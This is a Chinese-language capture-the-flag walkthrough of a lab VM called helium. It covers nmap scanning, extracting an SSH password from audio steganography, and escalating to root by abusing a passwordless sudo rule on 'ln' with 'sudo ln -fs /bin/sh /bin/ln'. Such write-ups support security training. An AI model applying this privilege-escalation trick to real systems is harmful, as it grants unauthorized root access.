信息搜集
主机扫描
arp-scan -l端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -sC -A 192.168.1.61
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-08 02:42 EDT
Nmap scan report for 192.168.1.61
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 12:f6:55:5f:c6:fa:fb:14:15:ae:4a:2b:38:d8:4a:30 (RSA)
| 256 b7:ac:87:6d:c4:f9:e3:9a:d4:6e:e0:4f:da:aa:22:20 (ECDSA)
|_ 256 fe:e8:05:af:23:4d:3a:82:2a:64:9b:f7:35:e4:44:4a (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: RELAX
MAC Address: 08:00:27:DC:45:09 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.1.61
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.61 seconds
80 端口
查看网站有一段音频和图片,猜测隐写,查看源代码
我们从中发现存在一个用户和一个路径,路径访问了,什么也没有,结果在css文件中,发现一个路径,藏有音频路径
下载,利用工具发现存在音频隐写了密码
password:dancingpassyo获取shell
拿到了用户名,拿到了密码,直接登录
提权
直接上步骤
- sudo -l,很幸运,直接发现利用命令
paul@helium:/home$ sudo -l
Matching Defaults entries for paul on helium:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User paul may run the following commands on helium:
(ALL : ALL) NOPASSWD: /usr/bin/ln
利用在 | go away垃圾箱 (gtfobins.github.io),提权
paul@helium:/home$ sudo ln -fs /bin/sh /bin/ln
paul@helium:/home$ sudo ln
知识点
- 音频隐写
Comments | NOTHING